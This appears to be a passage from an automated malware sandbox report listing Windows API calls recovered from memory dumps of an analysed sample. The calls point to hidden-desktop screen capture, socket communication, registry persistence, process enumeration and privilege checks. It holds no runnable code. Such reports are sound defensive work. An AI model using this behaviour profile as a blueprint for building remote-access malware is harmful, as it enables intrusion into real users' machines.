                                                                                                                                                                                                            • IsWindowVisible.USER32(02BBD21D), ref: 02BBCAAF
                                                                                                                                                                                                            • GetWindowInfo.USER32(02BBD21D,?), ref: 02BBCAC9
                                                                                                                                                                                                            • GetClassLongA.USER32(02BBD21D,000000E6), ref: 02BBCB1E
                                                                                                                                                                                                            • PrintWindow.USER32(02BBD21D,?,00000000), ref: 02BBCB37
                                                                                                                                                                                                            • BitBlt.GDI32(02BBCD02,?,?,?,?,753DBCB0,00000000,00000000,00CC0020), ref: 02BBCBDE
                                                                                                                                                                                                              • Part of subcall function 02BBDCE0: GetClassNameA.USER32(?,?,00000101), ref: 02BBDCF6
                                                                                                                                                                                                              • Part of subcall function 02BBC8D0: SendMessageA.USER32(00000000,?,00000004,00000000), ref: 02BBC8F8
                                                                                                                                                                                                              • Part of subcall function 02BBC8D0: GdiFlush.GDI32(00000000,?,02BBC9F1,00000000,?), ref: 02BBC90E
                                                                                                                                                                                                              • Part of subcall function 02BBC8D0: BitBlt.GDI32(02BBC9F1,00000000,00000000,?,02BBC9F1,?,00000000,00000000,00CC0020), ref: 02BBC934
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$Class$FlushInfoLongMessageNamePrintSendVisible
                                                                                                                                                                                                            • String ID: <$@J=u
                                                                                                                                                                                                            • API String ID: 2334662925-1520792215
                                                                                                                                                                                                            • Opcode ID: a7c8c29dce4c9cf03e25e1677f4eae2ef7a6c31e9cdc45d25ac699b5dc9156fc
                                                                                                                                                                                                            • Instruction ID: db58c8c76d02ac0d3a73afb1a695c5b745e578af8de367ce0ebe5a4d7ef6bbc4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7c8c29dce4c9cf03e25e1677f4eae2ef7a6c31e9cdc45d25ac699b5dc9156fc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49414B71E00519AFCB29CF98C884AFEFBBAFF44354F55859AE405E3640DBB0A951CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • send.WS2_32(?,02BF9E44,00000002,00000000), ref: 02BC9A2A
                                                                                                                                                                                                            • recv.WS2_32(?,?,00000002,00000000), ref: 02BC9A4E
                                                                                                                                                                                                            • recv.WS2_32(?,00000001,?,00000000), ref: 02BC9A7C
                                                                                                                                                                                                            • recv.WS2_32(?,?,00000001,00000000), ref: 02BC9AA0
                                                                                                                                                                                                            • recv.WS2_32(?,?,?,00000000), ref: 02BC9AC5
                                                                                                                                                                                                            • lstrcmpA.KERNEL32(02BFFCA8,00000001,?,00000000), ref: 02BC9AED
                                                                                                                                                                                                            • lstrcmpA.KERNEL32(02BFFBA0,?,?,00000000), ref: 02BC9AFF
                                                                                                                                                                                                            • send.WS2_32(?,02BF9E48,00000002,00000000), ref: 02BC9B0E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: recv$lstrcmpsend
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1090895577-0
                                                                                                                                                                                                            • Opcode ID: 1161220944b3bc6f35c065c570529cf477afc2d7e7bad474c683c61b2c0db2db
                                                                                                                                                                                                            • Instruction ID: 4c6184e537029339c54367f6f1a66f9885a59fa3fa3ceffc68d95c872a7c63e6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1161220944b3bc6f35c065c570529cf477afc2d7e7bad474c683c61b2c0db2db
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54317D71A4475D39FB2196644C41FFFB76C9B85700F1042C5F74497182D3B15A4A8BA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,?,?,02BB9F49,00000000,?,?,?,?,02BB9400,?,?), ref: 02BB9C41
                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000000,00000000), ref: 02BB9C5F
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,?,?,?,02BB9F49,00000000,?,?,?,?,02BB9400,?,?), ref: 02BB9D2F
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,?,?,?,02BB9F49,00000000,?,?,?,?,02BB9400,?,?), ref: 02BB9D51
                                                                                                                                                                                                            • SendMessageA.USER32(?,0000E2AD,00000000,00000000), ref: 02BB9D98
                                                                                                                                                                                                            • SendMessageW.USER32(?,?,00000003,00000000), ref: 02BB9DBE
                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,?,?), ref: 02BB9DCB
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$MutexReleaseSend$ObjectPostSingleVirtualWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3783495248-0
                                                                                                                                                                                                            • Opcode ID: 52189b05ec55b5cacffad598d65684f0e5e0d1eef0209be64df062952523c0e0
                                                                                                                                                                                                            • Instruction ID: 0bd94dd470583f18444364c3bf1778933e6126b543566baf1e43671aa361e62c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 52189b05ec55b5cacffad598d65684f0e5e0d1eef0209be64df062952523c0e0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE514932A44684EAD722CF29A848BF53BD0DF43365F0845C9EB918B2D3C3B99555CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5A60
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5A8C
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5AB3
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BB5AD4
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000388,000003E8), ref: 02BB5B04
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000388), ref: 02BB5B25
                                                                                                                                                                                                            • SetLastError.KERNEL32(?), ref: 02BB5B3E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2971961948-0
                                                                                                                                                                                                            • Opcode ID: e60a4c4affec8569e5545540b7ea6ef97377c587876922c35dd4f04ec26028c8
                                                                                                                                                                                                            • Instruction ID: 0549f9420ea0217df0aba14b3a7f9bde85f29d6c88d2419e604151d1a953be39
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e60a4c4affec8569e5545540b7ea6ef97377c587876922c35dd4f04ec26028c8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B41E7B1D40208AFDB51DFA9D880AEDBBF5FF48311F94416AE904F7200E770AA018FA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BB5B68
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5B99
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5BC5
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5BEC
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000388,000003E8), ref: 02BB5C1D
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000388), ref: 02BB5C3E
                                                                                                                                                                                                            • SetLastError.KERNEL32(?), ref: 02BB5C48
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2971961948-0
                                                                                                                                                                                                            • Opcode ID: 1171e5cc5449a88869ce7b05bb0c6bba11cca1357e18e27b71f94175c1e8e749
                                                                                                                                                                                                            • Instruction ID: bd57f18481b553a7f84f78858f3179707275931cedb297bae45731c75c77d53e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1171e5cc5449a88869ce7b05bb0c6bba11cca1357e18e27b71f94175c1e8e749
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C311CB1E40208EFDB90DFA8D884AEDBBF5FF48311F54856AE518E7200E77099018FA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BBBB8F
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BBBBBB
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BBBBE2
                                                                                                                                                                                                            • GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 02BBBC11
                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,69889606a), ref: 02BBBC27
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$InformationObjectUserlstrcmpi
                                                                                                                                                                                                            • String ID: 69889606a
                                                                                                                                                                                                            • API String ID: 410342393-3166098420
                                                                                                                                                                                                            • Opcode ID: 5868db8f9e9c25e2658847fe7c1233b7b7c21dfd1d385b52e10c793a36452b77
                                                                                                                                                                                                            • Instruction ID: 6f6542b5f4a3f5f1b5f3fb12c1d02fc80a48ba2dd7e692181701aeb792ef5cbd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5868db8f9e9c25e2658847fe7c1233b7b7c21dfd1d385b52e10c793a36452b77
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C31C9B1E4020DAFDB50DFA9D885AEEBBF4FB48705F50806AE508E7240E7745A55CF90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 004015C4
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004015CF
                                                                                                                                                                                                            • Process32First.KERNEL32 ref: 004015F5
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,?), ref: 00401610
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,?), ref: 0040161C
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401638
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040164A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3955875343-0
                                                                                                                                                                                                            • Opcode ID: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                            • Instruction ID: d18670d365493a771e2935c97cc000c5a2e18494483a7794571357713e5f98ef
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4111C6B25043106BD310EF55DC4899BBBD8EBE9361F04453AFA55A3290E335D9448BEA
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD4C14
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02BD4C1F
                                                                                                                                                                                                            • Process32First.KERNEL32 ref: 02BD4C45
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,?), ref: 02BD4C60
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,?), ref: 02BD4C6C
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BD4C88
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD4C9A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3955875343-0
                                                                                                                                                                                                            • Opcode ID: c8349ffdd4e305f979a89ef18505f57c8737e0ed6bd463d4184c54319542220e
                                                                                                                                                                                                            • Instruction ID: 4acfb65dcbae271952f9cc4bb3996e69e567d72a237f8d1e37ccab7070891e4d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8349ffdd4e305f979a89ef18505f57c8737e0ed6bd463d4184c54319542220e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A211A572A053105BD320DF65EC49ADBBBACEB853A4F448A59FE5483180E7309519CBF6
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,-80000001,?,?,?,?,?,?,0000001C,00000000), ref: 02BC18AD
                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(-80000001,698893E4a,00000000,00000001,?,00000104,?,?,?,?,0000001C,00000000), ref: 02BC18CF
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(-80000001,?,?,?,?,0000001C,00000000), ref: 02BC18DD
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(-80000001,?,?,?,?,0000001C,00000000), ref: 02BC18F0
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseFlushOpenValue
                                                                                                                                                                                                            • String ID: 698893E4a$software\microsoft
                                                                                                                                                                                                            • API String ID: 2510291871-2192386419
                                                                                                                                                                                                            • Opcode ID: 07b752f45d239b14a6f9d77945e6fef9fdc9a4d5d8a3c6c733fe48adc81bb746
                                                                                                                                                                                                            • Instruction ID: bfa7b4f6deb79c64f231ff8cc74871449361d7d9c97f261557a0a095ec902028
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 07b752f45d239b14a6f9d77945e6fef9fdc9a4d5d8a3c6c733fe48adc81bb746
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE11C174A18204ABEB24CA74C888FAE3369EF48744F6044ACF689E7141D670E9958B50
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • htons.WS2_32(?), ref: 02BE1314
                                                                                                                                                                                                            • inet_addr.WS2_32(?), ref: 02BE131F
                                                                                                                                                                                                            • htonl.WS2_32(000000FF), ref: 02BE132A
                                                                                                                                                                                                            • gethostbyname.WS2_32(?), ref: 02BE1336
                                                                                                                                                                                                            • socket.WS2_32(00000002,00000001,00000000), ref: 02BE1350
                                                                                                                                                                                                            • connect.WS2_32(00000000,?,00000010), ref: 02BE1363
                                                                                                                                                                                                            • closesocket.WS2_32(00000000), ref: 02BE136E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: closesocketconnectgethostbynamehtonlhtonsinet_addrsocket
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 298246419-0
                                                                                                                                                                                                            • Opcode ID: 877c87494c6966d192ffe5fb855015758c87863f1f9df9ff88c939973cfe7a6b
                                                                                                                                                                                                            • Instruction ID: 1b4ee23bf4d181c7cd14ba6c60c2e9eaa2246d35a2f6b2214f27c74f04eacf03
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 877c87494c6966d192ffe5fb855015758c87863f1f9df9ff88c939973cfe7a6b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54117071E50208ABDF109BB9D848B9EB779FF45391F808659F612D7291EB7099108B60
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BBD860,00000000,00000000,00000000), ref: 02BBD8A4
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,?,02BB9D7A,?,?,?,?,02BB9F49,00000000,?,?,?,?,02BB9400), ref: 02BBD8BC
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,02BB9D7A,?,?,?,?,02BB9F49,00000000,?,?,?,?,02BB9400,?), ref: 02BBD8CD
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,02BB9D7A,?,?,?,?,02BB9F49,00000000,?,?,?,?,02BB9400), ref: 02BBD8DC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BBD910
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02BBD917
                                                                                                                                                                                                            • PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02BBD92B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$CloseCreateInformationMessageMutexObjectPostReleaseSingleThreadWaitWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 731183410-0
                                                                                                                                                                                                            • Opcode ID: 2c3422a4a03deaaa73ae56fb0effdffe2829beab1da658f07ea447d537737af3
                                                                                                                                                                                                            • Instruction ID: 96c64e46ff88d819774451b82fa4234a10183e546d8466ce4a33770c12b9722e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c3422a4a03deaaa73ae56fb0effdffe2829beab1da658f07ea447d537737af3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B11E130A81614ABE7618F64DC0DFEA37E8EF08B51F5446E4FB04AB2D1C7F865108BA4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BC5B18
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(02BC6C37,698895c5a,00000000,?,00000000,?), ref: 02BC5B5A
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(02BC6C37), ref: 02BC5B64
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(-80000001), ref: 02BC5B2A
                                                                                                                                                                                                              • Part of subcall function 02BB3420: IsUserAnAdmin.SHELL32 ref: 02BB3428
                                                                                                                                                                                                              • Part of subcall function 02BB3420: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02BC5B76), ref: 02BB345F
                                                                                                                                                                                                              • Part of subcall function 02BB3420: RegQueryValueExA.ADVAPI32(02BC5B76,69889322a,00000000,?,00000000,?), ref: 02BB347C
                                                                                                                                                                                                              • Part of subcall function 02BB3420: RegCloseKey.ADVAPI32(02BC5B76), ref: 02BB3486
                                                                                                                                                                                                              • Part of subcall function 02BB3420: RegOpenKeyExA.ADVAPI32(80000002,software\microsoft,00000000,00000101,?), ref: 02BB34B9
                                                                                                                                                                                                              • Part of subcall function 02BB3420: RegQueryValueExA.ADVAPI32(?,69889322a,00000000,?,00000000,?), ref: 02BB34D6
                                                                                                                                                                                                              • Part of subcall function 02BB3420: RegCloseKey.ADVAPI32(?), ref: 02BB34E0
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                            • String ID: 698895c5a$software\microsoft
                                                                                                                                                                                                            • API String ID: 2113243795-181604564
                                                                                                                                                                                                            • Opcode ID: 9c33366b38e487c70453eb33eeacd3520318844fb616a913f72993651c9a1e62
                                                                                                                                                                                                            • Instruction ID: a62715dba59afcd3f8e8fea421f693567b980b65ed039a08091328cd8cbc8039
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c33366b38e487c70453eb33eeacd3520318844fb616a913f72993651c9a1e62
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F0112B5E90209ABDB20DFF4CC45BEEBBB8EB04744F504698F615E7280E774A5148B94
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • \\?\globalroot\systemroot\system32\tasks\, xrefs: 004034C9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
                                                                                                                                                                                                            • String ID: \\?\globalroot\systemroot\system32\tasks\
                                                                                                                                                                                                            • API String ID: 4133869067-1576788796
                                                                                                                                                                                                            • Opcode ID: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                            • Instruction ID: a2ec502b7bb4083542b5d35a97e2222aece09e1ccb5a5fef7106c32bda11fc1e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 150165B5A00218FBEB24DFA0DD48F9A7BBCAB44B06F0080A5E609B2191D6749B44DF65
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • shutdown.WS2_32(?,00000001), ref: 02BC990B
                                                                                                                                                                                                            • shutdown.WS2_32(02BC99EC,00000001), ref: 02BC9910
                                                                                                                                                                                                            • recv.WS2_32(02BC99EC,?,00000400,00000000), ref: 02BC992F
                                                                                                                                                                                                            • recv.WS2_32(?,?,00000400,00000000), ref: 02BC9945
                                                                                                                                                                                                            • closesocket.WS2_32(?), ref: 02BC9959
                                                                                                                                                                                                            • closesocket.WS2_32(02BC99EC), ref: 02BC995C
                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 02BC9960
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: closesocketrecvshutdown$ExitThread
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1638183600-0
                                                                                                                                                                                                            • Opcode ID: c75591cef078fd99a1ff70c216e1cf00fad9c0925acd8ed1c4b25015327413ee
                                                                                                                                                                                                            • Instruction ID: 4c186b00760b2f8fd01949405e0fc233ed56aee6f43434fc364ee06110437276
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c75591cef078fd99a1ff70c216e1cf00fad9c0925acd8ed1c4b25015327413ee
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8AF0A4B2950718BBE7309A64CC45F9B3B6CEB48790F004444BB04BB180D6B4B800CFE4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000102,?,?,?,02BB3B25,?), ref: 02BB38C0
                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(00000000,6988939ca,00000000,00000004,?,00000004,?,?,02BB3B25,?), ref: 02BB38DC
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(00000000,?,?,02BB3B25,?), ref: 02BB38EA
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000,?,?,02BB3B25,?), ref: 02BB38F8
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
